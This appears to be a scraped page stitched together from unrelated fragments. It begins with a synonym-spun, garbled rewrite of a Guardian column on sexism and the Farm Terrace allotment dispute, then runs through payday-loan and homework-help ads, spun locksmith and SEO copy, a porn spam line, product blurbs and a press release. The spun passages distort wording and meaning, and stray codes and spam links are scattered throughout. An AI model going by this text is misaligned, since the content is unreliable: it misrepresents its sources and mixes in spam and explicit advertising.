Donald Trump, a man with so much evident disdain for ladies that it feels practically inconceivable – like viewing an anecdotal oppressed world play out on our TV screens – is running for president. Investigation has demonstrated that, if ladies were rejected and just US men were qualified to vote, Trump would win the race. It is liberally evident that there are a large number of individuals who might preferably have a rightist than a female as pioneer. We are informed that ladies can accomplish anything these days – “so what are you crying about?” being the inescapable subtext. “Take a gander at Hillary,” we are told, to which the unavoidable rejoinder is: “Yes, take a gander at Hillary. Take a gander at what she is up against.”
There are different worries, obviously. The way the past sexual conduct of the complainant in the Ched Evans case was pored over amid his fruitful interest and in court this month has caused across the board daunt. At that point there’s the conclusion of aggressive behavior at home sanctuaries – 17% have shut because of financing cuts, 32 of which were authority administrations for dark and ethnic minority ladies, and 48% of 167 abusive behavior at home administrations in England said they were running administrations with no subsidizing. Two ladies seven days are killed by their accomplices or ex-accomplices, and powerless ladies, for example, female refuge searchers keep on being mishandled. There were 99 pregnant ladies held in Yarl’s Wood migration expulsion focus a year ago. Three Serco specialists are at present in court over the asserted assault of a Yarl’s Wood prisoner. As a current report noticed, the badgering and mishandle of young ladies in schools is endemic. HE649	HE745	HE841
I participated in a women’s activist level headed discussion this month, amid which the telecaster Jenni Murray related being turned down for a home loan in the 1970s for no other explanation than her sexual orientation; another speaker talked about the murder of her companion at 18 by a beau; and the DJ Clara Amfo communicated her dissatisfaction at being not able well-spoken her outrage about female persecution without being named an “irate dark lady”. I returned home discouraged and sorrowful. Looked with these calming certainties, is it any ponder, truly, that such a significant number of individuals look for shelter in belligerence rather about two-piece waxes?
I’ve been to enough schools to converse with young ladies about woman’s rights to realize that women’s activist “cushion” can be a simple approach to open an exchange – a “portal sedate” maybe, for those new to the theme, or put off or scared by the generalizations encompassing it. It’s vital that high school young ladies especially question why it is they feel forced into certain sexual practices. That issue does not leave once you proclaim that the “full shrub” is back. The effect of explicit entertainment in transit youngsters direct connections goes path past a couple of wax strips, taking in issues of assent, compulsion and manhandle, typification, preparing and exact retribution porn. It’s all chipper stuff. HE665	HE761	HE857
The individual is political, the women’s activists of the 1970s let us know, and this has transformed into a peculiar sort of decision women’s liberation where ladies are urged to look at their garments, their footwear, their prepping, their conduct, each and every decision that they make, with a specific end goal to evaluate whether it coordinates. In any case, the master plan is presently so alarmingly clear that it clouds these trifling inquiries. Flexibility is never so natural to envision as when it may be taken away. Most ladies realize that our shrubberies have almost no to do with it.
In 2014, there was a dissent outside the Royal Courts of Justice. The nonconformists were vivid: with extravagant dresses, a honey bee ensemble and inflatables. They had shrewd signs, for example, “Give Peas a Chance” and “Don’t Lose the Plot”. The challenge was portrayed as a “turf war” by daily paper feature authors, since they cherish a play on words, and in light of the fact that it was about assignments. Last Friday, the nonconformists were back, this time with wheelbarrows, pumpkins and deliver, in light of the fact that by and by Watford board had connected to close Farm Terrace designations, and by and by a portion of the general population of Watford declined and battled back. HE1020	HE1202	HE1057
On paper, Watford chamber’s justification for shutting Farm Terrace may sound sensible, despite the fact that the plots have been there since 1896 and have statutory security. The committee needs to fabricate a “wellbeing grounds”, an Orwellian-sounding plan that fuses another doctor’s facility, green spaces and that feared expression adored of organizers, a “group center point”. Watford’s chosen leader, Dorothy Thornhill, met the last time the turf war got the chance to court, said that it would bring “up to 1,300 new occupations, truly necessary homes, green open spaces which can be delighted in by all and group offices, incorporating a group center point with shops”. She likewise said Farm Terrace plots were “a truly ugly, abandoned site”. HE1038	HE1220	HE1075
‘The Farm Terrace case matters since it is a quarrel over what is of esteem.’ The campaigners in 2014. Photo: Cathy Gordon/PA Archive/PA Images
It’s hard to protest another doctor’s facility or 1,300 new employments. Be that as it may, anything that uses the articulation “green spaces” raises my passion, since it implies that whatever is left of the undertaking is hard spaces and cement. The committee’s “end-all strategy” is really indistinct: even the healing facility doesn’t realize what it will utilize the site for yet (Sara Jane Trebar, a Farm Terrace campaigner, supposes it will move toward becoming 68 houses and an auto stop for Watford football club). In any case, if it somehow happened to be worked without allocations, as the chairman’s remarks infer, it would be a claim objective. Cultivating, as a Social Care Institute for Excellence audit of confirmation appeared in 2013, harvests “a scope of advantages crosswise over enthusiastic, social, professional, physical and otherworldly spaces”. Assignments are as useful for the general population of Watford as that group center with shops (which Watford apparently as of now has a lot of). HE1046	HE1228	HE1083
‘Five minutes at my assignment, stooping to weed, putting my hands into soil, and my soul lifts.’ Photograph: Sam Frost for the Guardian
I bolster the Farm Terrace warriors since I’d battle for my plot, despite the fact that I’m an indiscriminate plant specialist. Slugs have eaten more this year than I’ve figured out how to develop. In any case, when I’ve battled with misery, when notwithstanding escaping the house appeared like the hardest thing on the planet, I still here and there strolled five minutes to my plot, past the flawless and prospering distributions that disgrace me; past the scruffy ones that solace me, to my helter skelter plot with its rose bed, solid nursery and despicable tomato plants, my heavenly collard greens and great roses.
Five minutes there, stooping to weed, putting my hands into soil, and my spirits lift. There are different wealth there as well: the businessperson who arrives pushed and leaves less so; the youthful families who leave with youngsters gripping sweetcorn or potatoes, now realizing that not all products of the soil come wrapped in plastic; the old young men who offer guidance, needed or undesirable. Becoming your own particular isn’t generally less expensive, yet it’s constantly better. It is extraordinary compared to other balances stays to our clique of forlorn, business driven independence. HE1355	HE1436	HE1396	HE1477
In law, designations are evidently very much secured, from the 1908 Small Holdings and Allotments Act that taught chambers to supply allocations to take care of demand, to additionally reinforced enactment in 1925. Designations on statutory land, for example, Farm Terrace, can’t be discarded without ecclesiastical assent. Be that as it may, weight gatherings, for example, Save All Allotments and Don’t Lose the Plot think the Localism Act of 2011 and late 2014 rules that as far as anyone knows improved the law just made it easier for plot land to be transformed into building destinations. In an opportunity of data ask for, Save All Allotments found that in the vicinity of 2007 and 2014, 194 of 198 applications to close designations were allowed by the secretary of state. The National Allotment Society is more energetic, calling attention to that of the 65 of 87 applications for transfer that were conceded in the vicinity of 2010 and 2013, most were for little bits of land for access or surge lightening, or land that had for quite some time been neglected. HE1370	HE1451	HE1411	HE1492
In any case, Farm Terrace isn’t neglected, nor forsaken, nor frightful. The case matters since it is a quarrel over what is of esteem. Obviously healing centers and houses are required. The issue with Farm Terrace is that Watford gathering can’t see the value of the plots, nor that an appropriate wellbeing plan can be more than a group center point, shops and a touch of green space. The legal survey suspended on Friday with no choice came to, yet my dirty allotmenting fingers are crossed that peas will be given a possibility. I trust that there is room, still, in our period of heckling, show disdain toward and significant uncertaia
Author descarwarePosted on October 20, 2017 Leave a comment on Photo: Murdo Macleod for the Guardian
Seth Goodburn appeared to be fit and well until the point when two weeks previously he was determined to have pancreatic growth. He passed on only 33 days after conclusion, investing quite a bit of that short energy in doctor’s facility. In the enthusiastic tornado of adapting to the poor guess his significant other, Lesley, felt their desires for Seth’s finish of-life mind were sidelined by medicinal experts attempting to carry out their activity.
“The NHS concentrates on the pharmaceutical and attempting to settle individuals notwithstanding when that is unrealistic,” she says. “A great deal of the discussions and choices that we may have made were dominated by managing what was the following medicinal treatment and mediation.” EF314 EF3258 EF1851 EF4796	EF611 EF3556 EF2149 EF5094 EF1196 EF4141 EF2734 EF5679
The Expat life offers so many unique and incredible opportunities and benefits. It has the potential to change your world view and how you live your everyday life, even long after you move back to your home country.
It’s considered one of the safest and happiest countries for expats to live in, and despite Australia’s isolation, it’s an extremely popular destination for expats. A country where work and lifestyle can combine perfectly and individual and family can relax and enjoy their “new home”.
A great read for Expats as they set up a new life in a new country. Some fabulous insights and tips for how to make the most of your experience. read more……
Victor, being from Manhattan, had the amazing opportunity to work with Vidal Sassoon for 10 years. This provided Victor with the opportunity to learn from the founder and Master Architectural Designer of today’s most popular hair fashions.
Victor remembers when Vidal Sassoon personally shared with him "... when you look at a line long & intensively enough you will be surprised what you find ..." This concept has served as the foundation of Victor’s artisan work that has made him so successful
"Throughout my readings, listenings , and walk in this life's journey, I have learnt that most people try to create New Realities with the same personalities. And I've found that does not work. We have to become somebody else. We need New Thoughts. New Information that will lead you to New Choices. And that will lead you New Behaviors and New Experiences. And those Experiences create New Emotions. That is what I call Evolution or Transcendence." Victor Hugo.
professional resume template word professional resume professional resume professional pertaining to resume template word professional resume template word 2010 441.
ETR ingénierie is an independent building engineering consulting firm, all trades, located in VENDEVILLE (59) in the North of France.
ETR ingénierie is first and foremost a human scale team close and responsive, with the last leading edge innovations.
Our 18 employees, project managers, engineers, technicians and technical expert projectors, will take care of your project from the tender response to its delivery.
Mastering, always being more efficient in the proposed techniques, listening to your needs to anticipate your expectations, are the main qualities that make ETR ingénierie, since its creation in 1998, a preferred partner for its customers.
В программе: фрагменты из популярных оперетт И. Штрауса, И. Кальмана, Ф. Легара, Ф. Лоу, И. Дунаевского и др.
Adorable babe with hairy pussy is getting fucked in front of the camera, for the first time ::: PERFECT GIRLS
I bought it the other day. It turned out impeccable. I used it against the normal way. The grid ,http://wholesalemaccosmetics.jigsy.com/#18668
Gaerne is not a name you hear about very often in the cycling world unless your in Europe and then you are familiar with this old Italian brand. The company started making shoes in 1962, so not a fly by night company at all. We have seen this brand in the USA for a while but it was only here and there and so we decided to get a pair and check them out for cyclocross. There is one thing that the Italian know how to do and that is style. And these shoes have plenty of that. We didn't choose the carbon sole as we wanted something that we could run in for cyclocross. What did we think about them? Well the Kobra shoe is one the easiest cycling shoes to run in. The fit of the shoe was really good and the style of our shoes was nothing short of eye catching. So much so that when ever we went to a race people would be checking out our shoes and telling us how cool they were. They always wanted to know where they could get a pair and how much they were. So we have listed below all of the features that come withthe Kobra MTB shoes.
The only thing we didnt like was that we developed hot spots after about 35 min of racing in the shoe. We were not able to determine if it was a pedal cleat interface problem or a orthotic problem.
Any time the Italians get into clothing they tend to do a really good job. In this case is just that. Not everyone has head of Gaerne or familiar with them. yes some of the worlds best cyclist use their shoes. now this says a lot because in the pro peloton some riders have shoe contacts and others just get their own shoes. Gaerne is a lot like another famous Italian cycling shoe maker in that they do cycling and motorcycle shoes and boots. The company was founded in 1962 and is proud to have "Made in Italy, Exported World Wide" on just about everything. this company holds to its roots and its mission. the Kobra comes in 4 colors and we just happened to get one of the limited edition ones in the Belgium colors. Which is pretty pimping in the cyclocross world. the shoe definitely turns heads. We had a lot of people telling us that they thoughts out shoes were really cool and wanting to know more about them. The Kobra
It doesn't matter your skill level or athletic history, we can bring you in, meet you where you are and help you attain the goals you've set for yourself. CrossFit FSI is located inside HardWodder One near the Scottsdale Airpark in North Scottsdale
With the Paleo Performance Challenge launching on August 10 I will be sending information and articles supporting why Paleo is great for both fat loss and CrossFit performance. This awesome article from the New York Times focuses primarily on Atkins diet but makes a strong point that refined carbs and not dietary fat is what…
Welcome to the Cross Link Radio website! Cross Link Radio is the answer to the age old question, “Is the mouth part of the body?” Host Shirley Gutkowski leads listeners down the garden path of whole health.
Listen in Monday, Wednesday, & Thursday mornings at 7:00am CST as your host Shirley Gutkowski talks to her guests about your work, your health, and your leisure.
Career Evolution – Making decisions for change Sherri Lukes didn’t go into dental hygiene right off the bat, her career […]
Found an answer for the clue Apparatus for Ali that we don't have? Then please submit it to us so we can make the clue database even better!
In our website you will be able to find the solution for Phone (4) crossword clue. Crosswords are the best brain teaser puzzles which we recommend you to play. First because you can learn each day new things from their questions and second because it grows your brain agility each day and more. We have started to share all the possible crossword clues of all crossword puzzles all around the world. If you can’t find any clue please contact us via email and we will be glad add that clue and it’s solutions so you keep playing your favorite crossword.
Let me guess, you have been playing NewsDay crossword and got stuck on the clue Bird with a shrill call. Well, you have come to the right place to find the answer to this clue.
Now you have the answer to your clue. Its time to move on to the next clue. You can browse through the list with all the answers to the NewsDay crossword of September 28th, 2017. Or you can use the search form below to find the answer (no matter if its NewsDay Crossword or any other crossword).
Coms service is always free to you. By submitting your information via this website, you are authorizing WhiteRockLoans. com and its partners to do a credit check, which may include verifying your social security number, driver license number or other identification, and a review of your creditworthiness.
Credit checks are usually performed by one of the major credit bureaus such as Experian, Equifax and TransUnion, but also may clydesdale bank personal loans online alternative credit bureaus such as Teletrack, DP Bureau or others. You also authorize WhiteRockLoans. com to share your information and credit history with a network of approved lenders and lending partners.
Lenders Disclosure of Terms. The lender you are connected to quick paperless loans provide documents that contain all fees and rate information pertaining to the loan being offered, including any potential fees for late-payments and the rules under which you may be allowed (if permitted by applicable law) to refinance, renew or rollover your loan.
Limit the amount you borrow. Only borrow what you know you can pay off with your first paycheck. Most companies will allow you to roll over the balance for several weeks or months, but they tack on fees each time you roll it over. This can result in you owing several times what you borrowed in the first place. Read the fine print.
First of all you don't need to leave your house and you can still get your instant payday loan. Secondly when applying for a payday loan online, you don't need to provide any documents.
In order to clydesdale bank personal loans online for a payday loans online uk you need to be over 18 years old. You also need to have some sort of income. The income may come from any source, such as employment, unemployment, pension, benefits, etc. You also need to have a valid bank account. You can apply for a payday loan online 247 including holidays, Saturdays and Sundays. We take pride on quickly finding you a lender. You only need to fill out a short form and then wait while we will make everything to find you the cheapest payday loan online.
After your loan is approved, you will be contacted with a lender to review the terms of the loan, and if accepted, the funds will be deposited directly into your bank account.
t: 01252 617385 e: This email address is being protected from spambots. You need JavaScript enabled to view it.
If you are considering extending your living space then adding a conservatory to your property could prove a cost-effective option. A conservatory is a popular choice for many, not only because it provides extra living space at a much lower cost per square metre than a full brick extension but because it also floods the home with natural light.
At Crown we understand that investing in a conservatory is not a decision to be made lightly and both the style and design are essential to get right if you are to make the most of the space available. So whether you need a playroom, dining room or are longing for a comfortable and relaxing sunshine room Crown can help you to plan and build a conservatory to fulfil the needs of you, your family and your lifestyle - all year round.
Crown have selected Ultraframe as one of their preferred manufacturers of conservatory roofing systems. The Ultraframe roof is the most configurable on the market, ensuring a conservatory can fit every home.
The Ultraframe products are thermally efficient with patented ventilation systems. They are available in a wide range of styles and personalised options, such as climate-controlled glazing to ensure your conservatory will be as individual as you are. Ultraframe roofs are engineered for the extremes of the UK climate and are approved by the British Board of Agrement (BBA) to last at least 25 years. We are an approved Ultraframe installer which means we have passed vigorous inspections and ongoing assessments.
Crown Conservatories also now include the new Ultraframe Roofing System - UltraRoof380 in the solid roof range. This is the most advanced replacement roof available on the market today. Check out Ultraframe's latest video which showcases the features and benefits of this new product. http://www.ultraframe-conservatories.co.uk/ultraroof380/
Crown is delighted to offer the Pilkington Activ SunShadeTM glass roof as an upgrade option to the Ultraframe range of conservatories and Livinrooms. You can take advantage of this great offer during July and August. Find out more >>>
With its revolutionary photo-catalytic and hydrophilic properties that creates a unique dual-action self-cleaning coating, the Pilkington Activ SunshadeTM reduces cleaning and maintenance costs by breaking down and loosening organic dirt so that when it rains. Instead of forming droplets on the glass, the water spreads evenly over the surface forming a thin film and helping to wash away any dirt and reduce streaks.
Please download The Benefits of a Pilkington Activ SunShade for further information, or call Crown on 01252 617385 for more information or to take advantage of the Roof Upgrade offer running throughout July & August.
Crown are delighted to also supply roofs from Atlas Glazed Roof Solutions. These roofs have impressive thermal efficiency and are the thinnest, strongest and lightest roof system we supply. The beauty and elegance of an Atlas roof speaks for itself - the best view you can imagine is what you will get with an Atlas Roof.
There are a variety of personalised options to customise the exterior and interior of your Crown Conservatory, including:
Utopia Roof – Virtually eliminating cold and draughts, the Utopia eco roof system requires only 788kw hours of energy to heat – 62% less than an ordinary roof.
Crown will provide guidance and support through every step of the process, from initial site survey and product selection through to installation and completion. If you haven’t yet visited one of our Showrooms, then our Conservatory Showrooms in Avondale Road in Fleet and at the Henry Street Garden Centre in Arborfield are well worth a visit to pick up some brochures and find out about the different frames, glazing, conservatory sizes and shape options that are available in the Crown range.
No appointment necessary, but if you would like a chat before you visit, please call 01252 617385 or take advantage of the Crown ‘Request a Call Back ’ option.
Crown Conservatories and Windows Ltd have showrooms in Fleet, Hampshire and Arborfield, Berkshire and provide windows, doors, conservatories, orangeries and roofing and building services to homes and businesses throughout Hampshire, Berkshire and Surrey.
All clients have 14 days to pickup your unit(s), IF you have not returned within that time period; your unit(s) becomes property of dr GEEKsters and will be donated, or auctioned/sold to cover the outstanding balance.(if any) (this disclaimer is also printed on the bottom of every invoice)
dr GEEKsters are NOT affliated with ANY manufacturer, or retail chain; thus any servicing WILL void the manufacturer's warranty or coverage. We are a privately owned 3rd party service provider. dr GEEKsters are not responsible or liable for any type of data loss or damage. All data recovery services are a best-effort attempt, as dr GEEKsters cannot guarantee full or even partial recovery of data, but will work to the limit of their abilities to restore data from the hardware or device. “PlayStation”, “PLAYSTATION”, and “PS” Family logo are registered trademarks of Sony Computer Entertainment Inc. “XBOX”, “XBOX360”, and “MICROSOFT” Family logo are registered trademarks of MICROSOFT Inc. “Nintendo”, “Nintendo Wii”, and “Wii” Family logos are registered trademarks of Nintendo Inc. “APPLE”, “MAC”, "iPad", "iPod", and “iPhone” Family logos are registered trademarks of APPLE COMPUTERS Inc. ALL RIGHTS RESERVED. dr GEEKsters are not affiliated with Sony Computer Entertainment Inc, MICROSOFT Inc., Nintendo Inc., APPLE COMPUTERS, or any other manufacturer.
dr GEEKsters are NOT responsible for ANY shipping charges OR damage to/from our location.(you as a client will have to pay all shipping charges TO [and/or] FROM our location) We recommend that you package your unit properly and with enough padding to keep it safe during transit.We are NOT responsible if we do not receive your package and/or it arrives damaged. It is in your best interest to get a signature confirmation & tracking number to insure that we receive your package on time.
The XBOX360 RROD REVIVE you are having done is NOT a permanent fix, as this problem is caused by an engineering/manufacturing overheating defect to which there is no permanent repair solution. We provide a best effort solution to get you functional again, but please understand that the same issue will return at some point in the future. (this disclaimer is also printed on the bottom of every invoice)
We do not allow for ANY cancellations after the unit is in our possession. IF we are diagnosing the unit first; then we have NO cancellations after you have given us the verbal or written approval for the repair.
All payments are final, absolutely no exchanges or refunds are given under ANY situation. STORE "geek-dollar" CREDIT may be issued based on our discretion.
Unless written otherwise, we have a small labor fee for ANY unit that we are not able to repair. Your WORK ORDER will state the terms of this charge; typically $10 - $49.
Due to the fact that each type of lock presents different parts, a locksmith has to understand just how each works, the way that it is made, and the way they'll remain in a placement to breach it Locksmith Rates Wakefield NE need to someone needs to open up a lock for which they've lost the trick. In a similar way, in case the essential can't be obtained of the lock after that you'll have to replace the cyndrical tube. It's evident from the above that the absolute best multipoint lock on earth is useless if fitted with a cyndrical tube that can conveniently be beat.
Any type of service needs locksmith services irrespective of its dimension. Sadly couple of understand about all of the solutions that locksmiths could supply. With our well-trained technicians, our specialist tools as well as range of product you will certainly protect the outright most fast, credible and sincere solution on the marketplace of Bronx.
If you're stuck outdoors your vehicle in a desolate location as you left the tricks inside, there are zero factors for you to obtain tensed. When it pertains to possessing a vehicle, preserving your auto tyres is an important element. Consequently when you have actually lost the automobile secrets, obtained shut out of the vehicle, need lock installation or repairing or such an issue, after that connecting with us would certainly permit you to clear up your trouble efficiently.
There are no familiar means to see a lock. Qualified RACV locksmiths on-call 24 Hr each day ready to react quickly in your regional area whether you remain in possession of a key broken in the lock or are shut out of your home, as well as professional lock choosing as well. For doors in the building, a solitary lock is mosting likely to do. You will certainly be able furthermore to have to opt for electronic digital locks or biometric locks.
Our service could aid you discover a Locksmith in and around could transform you into a new lorry secret, also described as transponder secret, at your benefit. Call our number now and also discover the locksmith solution you have actually made. For that reason, it's required to utilize an outstanding locksmith solution to aid you with these sort of problems. There are various services which you could count on for service yet when you prefer special info the very best call Wakefield Locksmith professional Company.
Our emergency situation locksmiths can assist with any sort of lockout you experience. Despite what you require from an emergency locksmith professional, we could help you 24 hours each day 365 days each year at quite short notification. You wouldn't want to be clambering for an emergency locksmith if you end up being shut out of your vehicle in the centre of nowhere. Our cars and truck locksmiths might likewise assist you with vehicle system substitutes. Such a vehicle locksmith provides you comfort given that you recognize that you may access their services at any specific time as well as day.
After such scenario, just a locksmith professional could give you with the outright most reliable solution for the satisfaction of the consumer and also obtain him from the circumstance. If you have actually missed out on positioned your cars and truck tricks, a Wakefield locksmith professional could visit your location and remake your vehicle key instantly! If you need a locksmith in Wakefield, MA we'll give rapid as well as trustworthy service. So next time that you're searching for a fantastic locksmith professional in Wakefield, provide our business a call, and also we'll be pleased to assist you by any means we can. Regardless of just what service you need from a neighbourhood auto locksmith in Wakefield you have come to the appropriate area.
Obtain your Python programming homework sent proper on-time with none unforeseen delay or latency. Our Python programming specialists can be found round the clock, so that you are certain that you'll get Reside chat and also other help amenities 24×seven.
I’ve been scuffling with my code. I don’t necessarily have the time to get it done as well with a full-time task. Avinash as well as their group at CodingZap helped me a great deal of and acquired it done at An inexpensive value in the timeframe i needed.
We're going to clear your uncertainties related to Individuals certain python applications to ensure sooner or later you will be able to carry out it by oneself and finally Raise your self-self esteem in python programming.
An essential objective of Python's developers is keeping it entertaining to use. This is mirrored from the language's name—a tribute for the British comedy group Monty Python[fifty three]—As well as in sometimes playful methods to tutorials and reference resources, like examples that refer to spam and eggs (from the popular Monty Python sketch) instead of the normal foo and bar.[54][55]
By building these projects, you’ll grow to be far more self-confident with your capacity to code and changeover from "programming looks like magic" to "oh, I am able to do that."
We will help to configure Eclipse, Anaconda or equivalent IDE to acquire you started. Python is broadly used in the scientific area, as it is totally free, dynamic.
Our Python assignment help is One of the useful reference most successful option with which pupils can greatly enhance their scholastic grades not simply just with responsibilities, research, Careers and Investigation nevertheless Also from the understanding.
The leading R implementation is prepared in R, C, and Fortran, and there are lots of other implementations aimed at strengthening velocity or escalating extensibility. A closely relevant implementation is pqR (quite swift R) by Radford M. Neal with improved memory administration and guidance for automated multithreading. Renjin and FastR are Java implementations of R for use in a Java Digital Device.
While creating programs in Python there's no must bother about lower degree facts like taking care of the memory employed by This system.
In a prior Model of PyPI, it used to be probable for maintainers to upload releases to PyPI utilizing a variety in the web browser.
We now have helped numerous pupils in performing their python courses by earning them thoroughly Outfitted with every one of the Main concepts that were needed during the implementation in their applications in python.
Avinash and his staff have already been an entire everyday living saver. They tackled my homework with no dilemma in any respect. I'm really satisfied with their function And that i will definitely keep carrying out organization with them.
From the Capstone Project, you’ll make use of the systems realized all through the Specialization to style and produce your very own applications for info retrieval, processing, and visualization....
Down load the file to your System. If you are not absolutely sure which to choose, find out more about putting in packages.
Kale Caesar Salad goes well with any choice of protein and is great on it’s own. The dressing if full of healthy fats, making this salad super satisfying & filling, but also great for fuelling your brain and reducing inflammation.
This will making more dressing than you need for a single serving of salad, so store in your fridge and have it for lunch tomorrow 🙂
I’m a Certified Holistic Nutritionist based in Toronto, Ontario. I work with my clients to help them discover the healing powers of food and reach their goals, whether that is weight loss, pain management, or chronic fatigue to name a few.
Food is fuel that directly affects our energy centre, physical and mental states. I want to help educate others on the healing powers of food and how they can change your life!
A Forex System That Grabs pips With Force After 10 years of intense research, testing and investing we have developed the Super Commando Forex System.
Hi Guys, This video is about the step by step procedure and instrictions about how you can apply for the SBI international Debit card global. This is the latest ...
Best Investments for NRIs looking to invest in India ! Bank Fixed Deposits : This is the most common and one of the favourite mode of investing by NRIs. Being an ...
Hey guys, I'm here back with another video and today, I'm going to speak about some exciting news that was just announced a few hours ago! SBI Holdings is ...
SBI starts blocking Insecure ATM Cards, you should exchange your Magnetic strip card with EMV Chip card for extra securities. Query Solved- 1. SBI Debit card ...
Mutual funds SBI | Buy Step by Step Mutual fund and SIP in SBI mutual fund | Buy Mutual funds Direct
Buy Mutual funds Direct | mutual funds sbi | Buy Mutual funds Online | Buy Step by Step Mutual fund and SIP in SBI mutual fund | Buy Mutual funds Online ...
Now open a Fixed Deposit without visiting the branch, at your convenience, with a click of a mouse. Watch our simple tutorial on how to open a fixed deposit ...
Japanese banks, long content to foster the nation's love for cash, are now diving into digital payments thanks to a regulatory change that threatens to usher in ...
eToro's CEO - Invest or keep it in a bank Open a Free Account http://etorocopytrading.com/open-free-account Becoming an eToro Guru is easier than you think ...
What if you have one app that caters to all your banking needs in one go? A 24x7 bank that is with you at all times. From loan applications to funds transfer and ...
TDS on FD new Rule | What is 15H form 15g how to fill | form 15h in hindi | form 15h online submit in sbi Hello friends In this video i will tell you about Form 15 h ...
Learn the step by step procedure of depositing cash in state bank CDM cash deposit machine without using your atm card to any ones other state bank account ...
SBI's Vistaar is a corporate internet banking suite for small and medium sized enterprises and institutions. In this video we will demonstrate how you can register ...
NOTE : TRADING IS RISKY ! In this video I have explained all the basic essentials that beginners would like to know about trading in the stock market with the ...
In this show we shall get down to the "real thing" in banking i.e. Financial Market. W e shall focus on the short term market that is the Money Market.This topic is ...
Now you can transfer SBI saving account online without visiting your branch. This video explains the online procedure of transferring Savings account from one ...
I have been making collages since I was a kid. I used to sit on the floor and tear up magazines for hours, joining pieces of paper of different shapes and colours together. Later I learned how to use a pair of scissors and some glue and started filling notebooks, walls, furniture or any kind of plain surface. Then I just learned how to edit pictures on the computer and stopped gluing everywhere.
I collect memories, personal and collective, national and international. My collages are made from an assemblage of different forms, thus creating a new one. They may include newspaper titles, classic and vintage photos, pieces of paper, portions of other artworks, book pages, glued on a new piece of paper.
CBRE Group, Inc., the global commercial real estate advisor, today announced that it has acquired Franc Warwick Chartered Surveyors, one of the UK's leading specialist real estate investment firms, further strengthening the company's leadership in the UK market.
Led by the highly respected Franco Sidoli, Franc Warwick, a firm he co-founded in 1988, is regarded as one of the leading UK commercial real estate investment specialists. The business focuses on capital market transactions, corporate acquisitions and sales, shopping centers, hotels and leisure, industrial and high street retail. The firm is particularly active in the central London market.
The Franc Warwick team will be integrated into CBRE's Capital Markets group and will have a particular focus on investment transactions, including acquisitions, with Franco Sidoli serving as an Executive Director.
CBRE was the most active capital markets advisor in the UK and Central London in H1 2012, according to Property Data. Recent transactions completed by CBRE's Capital Markets teams include: the Sentrum portfolio by Digital Realty for £715 million (approx. 894 million); Plantation Place, London for £491 million (approx. 614 million); Devonshire Square, London for £340 million (approx. 425 million), and the acquisition of the UK Logistics Fund by Segro and Moorfield REF II for £314 million (approx. 392 million).
"We continue to invest in our business in areas of critical importance to our clients to ensure that we can offer them the best possible advice in any market in which we operate. Our long term strategy has seen CBRE perform very strongly throughout periods of market uncertainty region-wide and globally. Bringing on board a professional of Franco's caliber is a great endorsement of our business and our strategic outlook, and I would like to add my welcome to him and his team."
"The UK's, and more specifically London's, property sector is an increasingly international market, attracting capital from all corners of the globe. Access to a truly global network of highly experienced investment and other experts is becoming an intrinsic part of our market. It is also increasingly fundamental to the best possible investment advice to have insight in, and access to, all aspects of the occupational markets.
"With this in mind, CBRE is the natural home for me and my team. The company truly excels at forging strong client relationships globally and innovating in a challenging market place. I look forward to becoming part of this firm."
"Franco and his team are highly regarded in the investment markets as individuals who develop a partnership style of working with their clients and are greatly attuned to their objectives. This is an approach we prize at CBRE. Across the UK, CBRE has a strong presence in the investment market across the UK and we are particularly proud of our recent successes in the London, occupier and shopping centre markets. The addition of Franco and his team is very exciting and will greatly add to our excellent UK offering as well as our business across the board."
Claus Thomas will become the new CEO of BNP Paribas Real Estate Investment Management Germany, following in the footsteps of Reinhard Mattern, who will be leaving the pos ...
Johannes Haug will be joiningPatrizia Immobilien AG as the new Head of European Real Estate Development. In this newly created pan-European role, Haug will be responsible ...
Cofinimmo has appointed Jean Kotarakos as future Chief Financial Officer of the Company.Kotarakos will replace Jérôme Descamps, who hasresigned from his posi ...
Martin Eberhardt FRICS has been appointed new Managing Director of the German investment and asset manager Corpus Sireo Real Estate, which is part of Swiss Life Asset Man ...
Corestate Capital Holdings has appointedDr Michael Bütter as a new Chief Executive Officer (CEO). The appointment will become effective on May 1st, 2018, following t ...
British Land announces that Lucinda Bell, Chief Financial Officer, has informed the Board of her intention to stand down from the Board and leave the Company on 4 April 2 ...
INREV has announced the appointment of Lonneke Löwik as the association’s new CEO, effective from December 2017. The appointment marks a return to INREV for L ...
TLG Immobilien hereby announces the final acceptance ratio at the end of the regular acceptance period with regard to its voluntary public takeover offer for WCM Beteilig ...
Your position as a first-class web marketing for legal representatives owner is specific if you keep faith in your very own skills and abilities. With genuine effort and commitment, you can end up being an economically successful entrepreneur. Consider these ideas to assist your SEO and web design for lawyers in discovering success.
Remember the phrase “peak oil” that was bandied about by doomsayers just a few short years ago? The notion that the world was about to imminently run out of oil, and that would be the end of cars, planes and trains and everything else that runs on petroleum? “Peak oil” today sounds about as ludicrous as a similarly misguided prognostication made around the same time: namely, the impending “death of SEO.” Keeping up with technical SEO
Excellent product and services are definitely the secrets to a rewarding web marketing for legal representatives. Increasing your sales and establishing a generous monetary cushion is reasonably easy if your SEO and website design for lawyers concentrates on offering the very best items on the market and supplying fantastic customer care. By diligently working to provide the very best possible customer experience at all times, you will likely remain in the position to broaden your customer base with recommendations. As long as you constantly make an effort to be the very best in what you do, you are ensured to be successful.
Your clients ought to be provided with a put on your website that enables them to publish feedback about your products and services. A strong online reputation is the natural outcome of gathering favorable evaluations from pleased customers. When you request a consumer's feedback on your products and services, they're going to be likely to react. One way to persuade other consumers share their opinions, just provide promos to those customers who leave their reviews.
A lot of customer depend upon ratings of prominent reviews sites and comments prior to checking out a web marketing for attorneys. To boost your online reputation, ensure you humbly request your customers to leave their evaluations about your products and services, so other customers can know how your business works. Check out all evaluations and make notification of those that can help your SEO and web design for attorneys's credibility. Clients leaving their opinions is extremely helpful and they're doing you a favor, hence you must reward them with promos and discounts.
Given that operating a new web marketing for lawyers takes up much time, never undervalue the time you will need to spend on it. Creating and preserving a lucrative business will necessitate a notable quantity of individual financial investments of time, effort, and attention. Multitasking early on in the site consulting for legal representatives procedure is rarely a terrific idea. An individual who understands when they're close to burning out is smart just if they entrust a few of their work to others - and delegation is important to be a wise business person.
Customers are most likely to return to a SEO and web design for attorneys where they got outstanding service. You must correspond in your endeavours to please clients, or they will take their web marketing for lawyers in other places. Customers will stay with companies who offer consistent high quality service, making it much easier to successfully introduce brand-new product or services. https://searchengineland.com/ppc-insights-top-sem-columns-2017-288652 will constantly be a company that has outstanding customer care in addition to having a fantastic product line.
Abstract: This article covers the basic requirements to create a socket connection and send data across it.
